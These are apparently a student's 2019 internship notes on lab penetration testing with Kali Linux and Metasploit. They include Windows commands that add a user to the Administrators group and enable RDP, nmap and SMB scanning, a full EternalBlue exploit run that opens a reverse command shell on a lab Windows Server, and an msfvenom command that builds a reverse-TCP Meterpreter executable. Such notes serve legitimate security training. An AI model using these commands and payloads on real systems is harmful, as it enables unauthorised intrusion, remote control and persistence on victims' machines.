Summer internship (training) notes, cybersecurity-related.

2019/7/6

Morning: installed VMware.

Afternoon: introduction to operating systems; installed Windows and Linux virtual machines.

2019/7/7

The physical (MAC) address is burned into the network card and is meant to be globally unique; the IPv4 address is assigned to the host by the network (statically or by DHCP) and can change.

Windows commands:

1. View the IP address:

ipconfig
// fuller output, including the physical (MAC) address:
ipconfig /all
// network connections and listening ports:
netstat -a

2. Users and groups

// list the local users
net user
// add a user named sms2056 with the password lovechina
net user sms2056 lovechina /add
// put that user into the local Administrators group
net localgroup Administrators sms2056 /add

Both changes need an elevated prompt, and on a monitored host they are loud: the user creation is logged as Security event 4720 and the group addition as event 4732.

3. Enabling RDP (port 3389)

All three methods do the same thing: they set fDenyTSConnections under HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server from 1 (deny) to 0 (allow). They need an administrator prompt, and if Windows Firewall is active the "Remote Desktop" rule group must also be enabled or the port stays unreachable from the network.

// Method one: write the registry value directly
// (the key name contains a space and has to be quoted; the Terminal" "Server spelling seen in some guides quotes just the space and is equivalent)
REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

// Method two: through WMI
wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1

// Method three: build a .reg file from a batch script, import it silently, then delete it.
// The redirection is written first on each line on purpose: in cmd a digit directly before > (as in 5.00>file or 00000000>>file)
// is read as a file-handle number, and the text is not written to the file.
// The first line creates the file with >, the rest append with >>. dword:00000d3d is 3389, so the default RDP port is kept.
>3389.reg  echo Windows Registry Editor Version 5.00
>>3389.reg echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
>>3389.reg echo "fDenyTSConnections"=dword:00000000
>>3389.reg echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]
>>3389.reg echo "PortNumber"=dword:00000d3d
>>3389.reg echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]
>>3389.reg echo "PortNumber"=dword:00000d3d
regedit /s 3389.reg
del 3389.reg

Linux commands

View the IP address (ifconfig comes from the older net-tools package; ip addr from iproute2 shows the same information on current systems):

root@qzz:~# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.92.131  netmask 255.255.255.0  broadcast 192.168.92.255
        inet6 fe80::20c:29ff:fe0e:c39b  prefixlen 64  scopeid 0x20<link>
        ether 00:0c:29:0e:c3:9b  txqueuelen 1000  (Ethernet)
        RX packets 33  bytes 2956 (2.8 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 20  bytes 2060 (2.0 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 10  bytes 456 (456.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 10  bytes 456 (456.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

The Linux ping command tests whether a target host is reachable by sending ICMP echo requests. A host that does not answer is not necessarily down; ICMP is often filtered.

(Details: https://www.cnblogs.com/ftl1012/p/ping.html)

(It keeps sending until stopped with Ctrl-C.)

root@qzz:~# ping <host IP>
PING <host IP> 56(84) bytes of data.
64 bytes from <host IP>: icmp_seq=1 ttl=64 time=0.022 ms
64 bytes from <host IP>: icmp_seq=2 ttl=64 time=0.077 ms

ls: list the files in a directory (the current one if no path is given); here the root directory:

root@qzz:~# ls /
0    boot  etc   initrd.img      lib    lib64   lost+found  mnt  proc  run   srv  tmp  var      vmlinuz.old
bin  dev   home  initrd.img.old  lib32  libx32  media       opt  root  sbin  sys  usr  vmlinuz
// ls -l shows the long listing: permissions, link count, owner, group, size, modification time and name.
// It does not show hidden files (names starting with "."); that needs -a, e.g. ls -la.

root@qzz:~# ls / -l
total 68
-rw-r--r--   1 root root     0 Mar  1 03:16 0
lrwxrwxrwx   1 root root     7 Jul  6 11:18 bin -> usr/bin
drwxr-xr-x   3 root root  4096 Jul  6 16:35 boot
drwxr-xr-x  17 root root  3320 Jul  7 13:43 dev
drwxr-xr-x 178 root root 12288 Jul  7 13:43 etc
drwxr-xr-x   2 root root  4096 Nov 29  2018 home
lrwxrwxrwx   1 root root    34 Jul  6 11:18 initrd.img -> boot/initrd.img-4.19.0-kali3-amd64
lrwxrwxrwx   1 root root    34 Jul  6 11:18 initrd.img.old -> boot/initrd.img-4.19.0-kali3-amd64
lrwxrwxrwx   1 root root     7 Jul  6 11:18 lib -> usr/lib
lrwxrwxrwx   1 root root     9 Jul  6 11:18 lib32 -> usr/lib32

pwd: print the current working directory

root@qzz:/# pwd
/

cd ..: go up one directory level

cd <path>: change to that directory (cd / goes to the filesystem root)

Metasploit setup

(Metasploit is an open-source penetration-testing framework: scanners, exploits and post-exploitation modules behind one console.)

0. Check the status of PostgreSQL
root@qzz:/# service postgresql status
● postgresql.service - PostgreSQL RDBMS
   Loaded: loaded (/lib/systemd/system/postgresql.service; disabled; vendor preset: disabled)
   Active: inactive (dead)
// it is stopped
1. Start the PostgreSQL service

Metasploit stores hosts, services and loot in PostgreSQL, so the PostgreSQL service has to be running first.

service postgresql start
// or
systemctl start postgresql
// after starting:
root@qzz:/# service postgresql status
● postgresql.service - PostgreSQL RDBMS
   Loaded: loaded (/lib/systemd/system/postgresql.service; disabled; vendor preset: disabled)
   Active: active (exited) since Sun 2019-07-07 13:51:54 CST; 2s ago
  Process: 4076 ExecStart=/bin/true (code=exited, status=0/SUCCESS)
 Main PID: 4076 (code=exited, status=0/SUCCESS)

7月 07 13:51:54 qzz systemd[1]: Starting PostgreSQL RDBMS...
7月 07 13:51:54 qzz systemd[1]: Started PostgreSQL RDBMS.

"active (exited)" with ExecStart=/bin/true looks odd but is normal: on Kali, postgresql.service is only a wrapper unit that pulls in the versioned cluster service. The real check is whether something is listening on port 5432, which ss -ant shows. Both sockets are bound to loopback only (127.0.0.1 and [::1]), which is the right exposure for a local Metasploit database.

root@qzz:/# ss -ant
State               Recv-Q              Send-Q                           Local Address:Port                            Peer Address:Port              
LISTEN              0                   128                                  127.0.0.1:5432                                 0.0.0.0:*                 
LISTEN              0                   128                                      [::1]:5432                                    [::]:*
2. Initialize the Metasploit database

Initialize it with the msfdb init command, which creates the msf role and databases and writes database.yml:

root@qzz:/# msfdb init
[i] Database already started
[+] Creating database user 'msf'
Enter password for new role:
Enter it again:
[+] Creating databases 'msf'
[+] Creating databases 'msf_test'
[+] Creating configuration file '/usr/share/metasploit-framework/config/database.yml'
[+] Creating initial database schema
3. Start Metasploit
msfdb run
// or
msfconsole
// (msfdb run starts the database if it is not running and then launches msfconsole)
root@qzz:/# msfdb run
[i] Database already started
                                                  
Call trans opt: received. 2-19-98 13:24:18 REC:Loc

     Trace program: running

           wake up, Neo...
        the matrix has you
      follow the white rabbit.

          knock, knock, Neo.

                        (`.         ,-,
                        ` `.    ,;' /
                         `.  ,'/ .'
                          `. X /.'
                .-;--''--.._` ` (
              .'            /   `
             ,           ` '   Q '
             ,         ,   `._    \
          ,.|         '     `-.;_'
          :  . `  ;    `  ` --,.._;
           ' `    ,   )   .'
              `._ ,  '   /_
                 ; ,''-,;' ``-
                  ``-..__``--`

                             https://metasploit.com


       =[ metasploit v5.0.2-dev                           ]
+ -- --=[ 1852 exploits - 1046 auxiliary - 325 post       ]
+ -- --=[ 541 payloads - 44 encoders - 10 nops            ]
+ -- --=[ 2 evasion                                       ]
+ -- --=[ ** This is Metasploit 5 development branch **   ]
// db_status confirms that msfconsole is connected to the database
msf5 > db_status
[*] Connected to msf. Connection type: postgresql.
4. Build the module cache
msf5 > db_rebuild_cache
[*] Purging and rebuilding the module cache in the background...
5. Test that the cache is usable

Using ms08-067 as the example:

msf5 > search ms08-067

Matching Modules
================

   Name                                 Disclosure Date  Rank   Check  Description
   ----                                 ---------------  ----   -----  -----------
   exploit/windows/smb/ms08_067_netapi  2008-10-28       great  Yes    MS08-067 Microsoft Server Service Relative Path Stack Corruption

MS08-067 is a vulnerability in the Windows Server service that allows remote code execution.

An affected system that receives a specially crafted RPC request can be made to execute arbitrary code. On Windows 2000, Windows XP and Windows Server 2003 no authentication is needed, which is why this vulnerability was usable by worms.

6. Start PostgreSQL at boot

Open a new terminal and run:

update-rc.d postgresql enable

(This goes through the SysV compatibility layer; on a systemd-based Kali the native equivalent is systemctl enable postgresql.)

Metasploit information gathering

1. Start MSF
root@qzz:~# msfdb run
[i] Database already started
                                                  

                 _---------.
             .' #######   ;."
  .---,.    ;@             @@`;   .---,..
." @@@@@'.,'@@            @@@@@',.'@@@@ ".
'-.@@@@@@@@@@@@@          @@@@@@@@@@@@@ @;
   `.@@@@@@@@@@@@        @@@@@@@@@@@@@@ .'
     "--'.@@@  -.@        @ ,'-   .'--"
          ".@' ; @       @ `.  ;'
            |@@@@ @@@     @    .
             ' @@@ @@   @@    ,
              `.@@@@    @@   .
                ',@@     @   ;           _____________
                 (   3 C    )     /|___ / Metasploit! \
                 ;@'. __*__,."    \|--- \_____________/
                  '(.,...."/


       =[ metasploit v5.0.2-dev                           ]
+ -- --=[ 1852 exploits - 1046 auxiliary - 325 post       ]
+ -- --=[ 541 payloads - 44 encoders - 10 nops            ]
+ -- --=[ 2 evasion                                       ]
+ -- --=[ ** This is Metasploit 5 development branch **   ]

Check the status:

msf5 > db_status
[*] Connected to msf. Connection type: postgresql.

Check the current workspace (default is the built-in one):

msf5 > workspace 
* default

Create a new workspace:

msf5 > workspace -a newwork
[*] Added workspace: newwork
[*] Workspace: newwork

A newly created workspace becomes the active one automatically; to pick a specific one, use workspace <name>.

Delete a workspace:

msf5 > workspace -d gongzuozhan
[*] Deleted workspace: gongzuozhan
2. Host discovery

Scan the current subnet:

-v prints verbose progress, -sV probes each open port for the service and version, and -oA <basename> saves the results in all three formats (.nmap, .gnmap and .xml) under that base name. nmap is not a Metasploit command: msfconsole passes anything it does not recognize to the shell, which the [*] exec: line shows. (db_nmap runs the same scan and imports the results straight into the workspace.)

(Details: https://www.cnblogs.com/chia/p/9040805.html)

msf5 > nmap -v -sV <own IP>/24 -oA 192_
[*] exec: nmap -v -sV <own IP>/24 -oA 192_

Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-07 14:10 CST
NSE: Loaded 43 scripts for scanning.
Initiating ARP Ping Scan at 14:10
Scanning 255 hosts [1 port/host]
Completed ARP Ping Scan at 14:10, 1.98s elapsed (255 total hosts)
Initiating Parallel DNS resolution of 255 hosts. at 14:10
Completed Parallel DNS resolution of 255 hosts. at 14:10, 0.07s elapsed

Ports found on one of the hosts (further down in the same output):

Host is up (0.00083s latency).
Not shown: 991 closed ports
PORT      STATE SERVICE        VERSION
135/tcp   open  msrpc          Microsoft Windows RPC
139/tcp   open  netbios-ssn    Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds   Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3389/tcp  open  ms-wbt-server?
49152/tcp open  msrpc          Microsoft Windows RPC
49153/tcp open  msrpc          Microsoft Windows RPC
49154/tcp open  msrpc          Microsoft Windows RPC
49155/tcp open  msrpc          Microsoft Windows RPC
49156/tcp open  msrpc          Microsoft Windows RPC

Note port 445.

Port 445 is SMB over TCP: it is what makes shared folders and printers on a LAN work, but it is also the service behind a long line of remote exploits (MS08-067 over RPC via SMB, and MS17-010 below). An attacker who reaches it with valid credentials, or with an exploit, gets access to the shares or code execution on the host. In October 2017, during the "Bad Rabbit" outbreak, CNCERT and other security bodies advised users to close ports 445 and 139 on computers and network devices.

(关于端口和一个实例参考:https://blog.csdn.net/wxl2012/article/details/5383321)

View the generated files:

msf5 > ls -l
[*] exec: ls -l

total 112
-rw-r--r-- 1 root root 14412 Jul  7 15:17 192_.gnmap
-rw-r--r-- 1 root root 15767 Jul  7 15:17 192_.nmap
-rw-r--r-- 1 root root 43207 Jul  7 15:17 192_.xml
drwxr-xr-x 2 root root  4096 Jul  6 12:59 Public
drwxr-xr-x 2 root root  4096 Jul  6 12:59 Templates
drwxr-xr-x 2 root root  4096 Jul  6 12:59 Videos
drwxr-xr-x 2 root root  4096 Jul  6 12:59 Pictures
drwxr-xr-x 2 root root  4096 Jul  6 12:59 Documents
drwxr-xr-x 2 root root  4096 Jul  6 12:59 Downloads
drwxr-xr-x 2 root root  4096 Jul  6 12:59 Music
drwxr-xr-x 4 root root  4096 Jul  6 16:35 Desktop
drwxr-xr-x 2 root root  4096 Jul  6 15:05 a

Import the results into the workspace you created (db_import understands the Nmap XML file):

msf5 > db_import 192_.xml
[*] Importing 'Nmap XML' data
[*] Import: Parsing with 'Nokogiri v1.10.1'
[*] Importing host 192.168.92.1
[*] Importing host 192.168.92.2
[*] Importing host 192.168.92.130
[*] Importing host 192.168.92.254
[*] Importing host 
[*] Successfully imported /root/192_.xml

Show the imported hosts:

msf5 > hosts

Hosts
=====

address         mac                name   os_name  os_flavor  os_sp  purpose  info  comments
-------         ---                ----   -------  ---------  -----  -------  ----  --------
192.168.92.1    00:50:56:c0:00:08  bogon  Unknown                    device         
192.168.92.2    00:50:56:f6:39:4b  bogon  Unknown                    device         
192.168.92.130  00:0c:29:ba:ab:08  bogon  Unknown                    device         
// own host IP address //                 bogon  Unknown                    device         
192.168.92.254  00:50:56:e9:af:8c  bogon  Unknown                    device

One of the entries is our own Kali host; it does not need scanning, so remove it from the workspace.

msf5 > hosts -d <address to delete>

Hosts
=====

address         mac  name   os_name  os_flavor  os_sp  purpose  info  comments
-------         ---  ----   -------  ---------  -----  -------  ----  --------
                   bogon  Unknown                    device         

[*] Deleted 1 hosts
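The Nmap XML file that -oA writes and db_import reads has a simple structure: one host element per address, holding the address, hostnames and ports elements. As an added example that is not part of the original notes, the following Python script does by hand what the db_import / hosts / hosts -d sequence does: it parses that XML, records MAC, hostname and open services per host, and lists the hosts exposing a given port while skipping the scanner's own address. The XML is a constructed, trimmed sample in Nmap's format using the addresses from the page; the service on 192.168.92.2, the closed port 80 and the Kali host's SSH entry are assumptions.

```python
import xml.etree.ElementTree as ET

# Constructed sample in Nmap's XML output format (the 192_.xml that -oA writes and
# db_import reads), trimmed to the elements parsed below. The addresses come from
# the page; the 192.168.92.2 service, port 80 and the Kali host's SSH entry are assumptions.
SAMPLE_NMAP_XML = """<nmaprun scanner="nmap" args="nmap -v -sV 192.168.92.0/24 -oA 192_">
  <host><status state="up"/>
    <address addr="192.168.92.2" addrtype="ipv4"/>
    <address addr="00:50:56:f6:39:4b" addrtype="mac"/>
    <ports>
      <port protocol="tcp" portid="53"><state state="open"/><service name="domain"/></port>
    </ports>
  </host>
  <host><status state="up"/>
    <address addr="192.168.92.130" addrtype="ipv4"/>
    <address addr="00:0c:29:ba:ab:08" addrtype="mac"/>
    <hostnames><hostname name="WIN-PA5UULAVJOQ" type="PTR"/></hostnames>
    <ports>
      <port protocol="tcp" portid="135"><state state="open"/><service name="msrpc" product="Microsoft Windows RPC"/></port>
      <port protocol="tcp" portid="445"><state state="open"/><service name="microsoft-ds" product="Microsoft Windows Server 2008 R2 - 2012 microsoft-ds"/></port>
      <port protocol="tcp" portid="3389"><state state="open"/><service name="ms-wbt-server"/></port>
      <port protocol="tcp" portid="80"><state state="closed"/><service name="http"/></port>
    </ports>
  </host>
  <host><status state="up"/>
    <address addr="192.168.92.131" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="22"><state state="open"/><service name="ssh"/></port>
    </ports>
  </host>
</nmaprun>
"""


def parse_nmap_xml(xml_text):
    """Return {ip: {"mac", "name", "ports": {(proto, port): service}}} for every host
    that has an IPv4 address; only ports whose state is "open" are kept."""
    hosts = {}
    root = ET.fromstring(xml_text)
    for host in root.iter("host"):
        ip = mac = None
        for addr in host.findall("address"):
            if addr.get("addrtype") == "ipv4":
                ip = addr.get("addr")
            elif addr.get("addrtype") == "mac":
                mac = addr.get("addr")
        if ip is None:
            continue
        hn = host.find("hostnames/hostname")
        ports = {}
        for port in host.findall("ports/port"):
            state = port.find("state")
            if state is None or state.get("state") != "open":
                continue
            svc = port.find("service")
            # prefer the -sV product string, fall back to the generic service name
            product = (svc.get("product") or svc.get("name")) if svc is not None else ""
            ports[(port.get("protocol"), int(port.get("portid")))] = product
        hosts[ip] = {"mac": mac,
                     "name": hn.get("name") if hn is not None else None,
                     "ports": ports}
    return hosts


def hosts_with_open_port(hosts, port, proto="tcp", exclude=()):
    """IPs exposing `port`, minus any address in `exclude` (e.g. the Kali box itself)."""
    return sorted(ip for ip, h in hosts.items()
                  if ip not in exclude and (proto, port) in h["ports"])


if __name__ == "__main__":
    found = parse_nmap_xml(SAMPLE_NMAP_XML)
    for ip in hosts_with_open_port(found, 445, exclude={"192.168.92.131"}):
        print(ip, found[ip]["name"], found[ip]["ports"][("tcp", 445)])
```

Run as a script it prints the hosts with 445 open; to use it on the real scan, pass the contents of 192_.xml to parse_nmap_xml instead of the sample. Putting your own address in exclude is the equivalent of the hosts -d step above, done before anything is imported.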
3. Port scanning

Search for the port scanners in Metasploit:

msf5 > search portscan

Matching Modules
================

   Name                                              Disclosure Date  Rank    Check  Description
   ----                                              ---------------  ----    -----  -----------
   auxiliary/scanner/http/wordpress_pingback_access                   normal  Yes    Wordpress Pingback Locator
   auxiliary/scanner/natpmp/natpmp_portscan                           normal  Yes    NAT-PMP External Port Scanner
   auxiliary/scanner/portscan/ack                                     normal  Yes    TCP ACK Firewall Scanner
   auxiliary/scanner/portscan/ftpbounce                               normal  Yes    FTP Bounce Port Scanner
   auxiliary/scanner/portscan/syn                                     normal  Yes    TCP SYN Port Scanner
   auxiliary/scanner/portscan/tcp                                     normal  Yes    TCP Port Scanner
   auxiliary/scanner/portscan/xmas                                    normal  Yes    TCP "XMas" Port Scanner
   auxiliary/scanner/sap/sap_router_portscanner                       normal  No     SAPRouter Port Scanner

There are several scanners; we use auxiliary/scanner/portscan/syn (a half-open scan that sends raw SYN packets, so it needs root, which is the case here).

msf5 > use auxiliary/scanner/portscan/syn
msf5 auxiliary(scanner/portscan/syn) >

The prompt now shows the loaded module.

Show the module options:

msf5 auxiliary(scanner/portscan/syn) > show options

Module options (auxiliary/scanner/portscan/syn):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   BATCHSIZE  256              yes       The number of hosts to scan per set
   DELAY      0                yes       The delay between connections, per thread, in milliseconds
   INTERFACE                   no        The name of the interface
   JITTER     0                yes       The delay jitter factor (maximum value by which to +/- DELAY) in milliseconds.
   PORTS      1-10000          yes       Ports to scan (e.g. 22-25,80,110-900)
   RHOSTS                      yes       The target address range or CIDR identifier
   SNAPLEN    65535            yes       The number of bytes to capture
   THREADS    1                yes       The number of concurrent threads
   TIMEOUT    500              yes       The reply read timeout in milliseconds

Load the scan targets: hosts -R sets RHOSTS to every host in the current workspace.

msf5 auxiliary(scanner/portscan/syn) > hosts -R

Hosts
=====

address         mac                name   os_name  os_flavor  os_sp  purpose  info  comments
-------         ---                ----   -------  ---------  -----  -------  ----  --------
192.168.92.1    00:50:56:c0:00:08  bogon  Unknown                    device         
192.168.92.2    00:50:56:f6:39:4b  bogon  Unknown                    device         
192.168.92.130  00:0c:29:ba:ab:08  bogon  Unknown                    device         
192.168.92.254  00:50:56:e9:af:8c  bogon  Unknown                    device         

RHOSTS => 192.168.92.1 192.168.92.2 192.168.92.130 192.168.92.254

Running show options again confirms the import (see the RHOSTS line):


msf5 auxiliary(scanner/portscan/syn) > show options

Module options (auxiliary/scanner/portscan/syn):

   Name       Current Setting                                          Required  Description
   ----       ---------------                                          --------  -----------
   BATCHSIZE  256                                                      yes       The number of hosts to scan per set
   DELAY      0                                                        yes       The delay between connections, per thread, in milliseconds
   INTERFACE                                                           no        The name of the interface
   JITTER     0                                                        yes       The delay jitter factor (maximum value by which to +/- DELAY) in milliseconds.
   PORTS      1-10000                                                  yes       Ports to scan (e.g. 22-25,80,110-900)
   RHOSTS     192.168.92.1 192.168.92.2 192.168.92.130 192.168.92.254  yes       The target address range or CIDR identifier
   SNAPLEN    65535                                                    yes       The number of bytes to capture
   THREADS    1                                                        yes       The number of concurrent threads
   TIMEOUT    500                                                      yes       The reply read timeout in milliseconds

Restrict the scan to port 445:

msf5 auxiliary(scanner/portscan/syn) > set PORTS 445
PORTS => 445

Run the scanner:

msf5 auxiliary(scanner/portscan/syn) > run

[+]  TCP OPEN 192.168.92.1:445
[+]  TCP OPEN 192.168.92.130:445
[*] Scanned 4 of 4 hosts (100% complete)
[*] Auxiliary module execution completed
4. SMB version scan

Search:

msf5 auxiliary(scanner/portscan/syn) > search smb_version

Matching Modules
================

   Name                               Disclosure Date  Rank    Check  Description
   ----                               ---------------  ----    -----  -----------
   auxiliary/scanner/smb/smb_version                   normal  Yes    SMB Version Detection

Switch to it:

msf5 auxiliary(scanner/portscan/syn) > use auxiliary/scanner/smb/smb_version
msf5 auxiliary(scanner/smb/smb_version) >

Load the targets:

msf5 auxiliary(scanner/smb/smb_version) > hosts -R

Hosts
=====

address         mac                name   os_name  os_flavor  os_sp  purpose  info  comments
-------         ---                ----   -------  ---------  -----  -------  ----  --------
192.168.92.1    00:50:56:c0:00:08  bogon  Unknown                    device         
192.168.92.2    00:50:56:f6:39:4b  bogon  Unknown                    device         
192.168.92.130  00:0c:29:ba:ab:08  bogon  Unknown                    device         
192.168.92.254  00:50:56:e9:af:8c  bogon  Unknown                    device         

RHOSTS => 192.168.92.1 192.168.92.2 192.168.92.130 192.168.92.254

Run:

msf5 auxiliary(scanner/smb/smb_version) > run

[*] 192.168.92.1:445      - Host could not be identified:  ()
[*] Scanned 1 of 4 hosts (25% complete)
[*] Scanned 2 of 4 hosts (50% complete)
[+] 192.168.92.130:445    - Host is running Windows 2008 R2 Enterprise SP1 (build:7601) (name:WIN-PA5UULAVJOQ) (workgroup:WORKGROUP )
[*] Scanned 3 of 4 hosts (75% complete)
[*] Scanned 4 of 4 hosts (100% complete)
[*] Auxiliary module execution completed

Show the service information gathered so far (the workspace now combines the nmap import with the smb_version results):

// go back to the top-level prompt first
msf5 auxiliary(scanner/smb/smb_version) > back
msf5 > 
// then list the services
msf5 > services
Services
========

host            port   proto  name             state  info
----            ----   -----  ----             -----  ----
192.168.92.1    135    tcp    msrpc            open   Microsoft Windows RPC
192.168.92.1    139    tcp    netbios-ssn      open   Microsoft Windows netbios-ssn
192.168.92.1    445    tcp    smb              open    ()
192.168.92.1    8082   tcp    blackice-alerts  open   
192.168.92.2    53     tcp    domain           open   unknown banner: hrb dns
192.168.92.130  135    tcp    msrpc            open   Microsoft Windows RPC
192.168.92.130  139    tcp    netbios-ssn      open   Microsoft Windows netbios-ssn
192.168.92.130  445    tcp    smb              open   Windows 2008 R2 Enterprise SP1 (build:7601) (name:WIN-PA5UULAVJOQ) (workgroup:WORKGROUP )
192.168.92.130  3389   tcp    ms-wbt-server    open   Microsoft Terminal Service
192.168.92.130  49152  tcp    msrpc            open   Microsoft Windows RPC
192.168.92.130  49153  tcp    msrpc            open   Microsoft Windows RPC
192.168.92.130  49154  tcp    msrpc            open   Microsoft Windows RPC
192.168.92.130  49155  tcp    msrpc            open   Microsoft Windows RPC
192.168.92.130  49156  tcp    msrpc            open   Microsoft Windows RPC

Metasploit EternalBlue exploitation

1. Search for the related modules
msf5 > search 17-010

Matching Modules
================

   Name                                           Disclosure Date  Rank     Check  Description
   ----                                           ---------------  ----     -----  -----------
   auxiliary/admin/smb/ms17_010_command           2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   auxiliary/scanner/smb/smb_ms17_010                              normal   Yes    MS17-010 SMB RCE Detection
   exploit/windows/smb/ms17_010_eternalblue       2017-03-14       average  No     MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   exploit/windows/smb/ms17_010_eternalblue_win8  2017-03-14       average  No     MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
   exploit/windows/smb/ms17_010_psexec            2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution

eternalblue is EternalBlue (永恒之蓝). Note the ranks: the scanner is a safe check, while both eternalblue exploits are rated average and have no check method, because they corrupt the kernel pool and can blue-screen the target.

2. Check which hosts are vulnerable
msf5 > use auxiliary/scanner/smb/smb_ms17_010
msf5 auxiliary(scanner/smb/smb_ms17_010) >
msf5 auxiliary(scanner/smb/smb_ms17_010) > hosts -R

Hosts
=====

address         mac                name             os_name          os_flavor   os_sp  purpose  info  comments
-------         ---                ----             -------          ---------   -----  -------  ----  --------
192.168.92.1    00:50:56:c0:00:08  bogon            Unknown                             device         
192.168.92.2    00:50:56:f6:39:4b  bogon            Unknown                             device         
192.168.92.130  00:0c:29:ba:ab:08  WIN-PA5UULAVJOQ  Windows 2008 R2  Enterprise  SP1    server         
                     bogon            Unknown                             device         
192.168.92.254  00:50:56:e9:af:8c  bogon            Unknown                             device         

RHOSTS => 192.168.92.1 192.168.92.2 192.168.92.130 192.168.92.131 192.168.92.254

msf5 auxiliary(scanner/smb/smb_ms17_010) > run

[-] 192.168.92.1:445      - An SMB Login Error occurred while connecting to the IPC$ tree.
[*] Scanned 1 of 5 hosts (20% complete)
[*] Scanned 2 of 5 hosts (40% complete)
[+] 192.168.92.130:445    - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Enterprise 7601 Service Pack 1 x64 (64-bit)
[*] Scanned 3 of 5 hosts (60% complete)
[*] Scanned 4 of 5 hosts (80% complete)
[*] Scanned 5 of 5 hosts (100% complete)
[*] Auxiliary module execution completed

The host reported as "Host is likely VULNERABLE to MS17-010!" is the one we can attack: 192.168.92.130. (The target list also contains the Kali VM itself again, 192.168.92.131, shown with a blank address in the table; harmless here, but a wasted probe and a reminder to keep the workspace clean.)

3. Attack the host

Load the exploit module:

msf5 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue
msf5 exploit(windows/smb/ms17_010_eternalblue) >

Set the target:

msf5 exploit(windows/smb/ms17_010_eternalblue) > set RHOST 192.168.92.130
RHOST => 192.168.92.130

Launch the attack with exploit (no payload was set, so the module default is used, which yields a plain command shell, as the session line shows):

msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit

[*] Started reverse TCP handler on 192.168.92.131:4444 
[*] 192.168.92.130:445 - Connecting to target for exploitation.
[+] 192.168.92.130:445 - Connection established for exploitation.
[+] 192.168.92.130:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.92.130:445 - CORE raw buffer dump (53 bytes)
[*] 192.168.92.130:445 - 0x00000000  57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32  Windows Server 2
[*] 192.168.92.130:445 - 0x00000010  30 30 38 20 52 32 20 45 6e 74 65 72 70 72 69 73  008 R2 Enterpris
[*] 192.168.92.130:445 - 0x00000020  65 20 37 36 30 31 20 53 65 72 76 69 63 65 20 50  e 7601 Service P
[*] 192.168.92.130:445 - 0x00000030  61 63 6b 20 31                                   ack 1           
[+] 192.168.92.130:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.92.130:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.92.130:445 - Sending all but last fragment of exploit packet
[*] 192.168.92.130:445 - Starting non-paged pool grooming
[+] 192.168.92.130:445 - Sending SMBv2 buffers
[+] 192.168.92.130:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.92.130:445 - Sending final SMBv2 buffers.
[*] 192.168.92.130:445 - Sending last fragment of exploit packet!
[*] 192.168.92.130:445 - Receiving response from exploit packet
[+] 192.168.92.130:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.92.130:445 - Sending egg to corrupted connection.
[*] 192.168.92.130:445 - Triggering free of corrupted buffer.
[*] Command shell session 1 opened (192.168.92.131:4444 -> 192.168.92.130:49897) at 2019-07-07 16:44:57 +0800
[+] 192.168.92.130:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.92.130:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.92.130:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

The WIN banner at the end shows the exploit succeeded; session 1 is a command shell on the target. Because the exploit works by corrupting the kernel pool, a failed attempt usually crashes the target, which is why the module is rated average and should only be run against lab machines you own.

Metasploit trojan (payload) generation

[Command reference: https://www.jianshu.com/p/bad2fc55beff?utm_campaign=maleskine&utm_content=note&utm_medium=seo_notes&utm_source=recommendation]

(A shared folder is used to move the file: create a folder on the host machine and it becomes visible inside the VMs.)

(To enable shared folders in VMware: right-click the VM - Settings - Options - Shared Folders - Enable - Add.)

1. Generate the payload [on the Kali side]
root@qzz:~# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=本地ip LPORT=6666 -f exe >a.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 510 bytes
Final size of exe file: 7168 bytes

a.exe is the name of the generated executable and can be anything. No encoder was applied, so this is the raw, well-known Meterpreter stager; any up-to-date antivirus flags it, which is fine for a lab VM without AV but not elsewhere.

The generated a.exe is now present:

root@qzz:~# ls
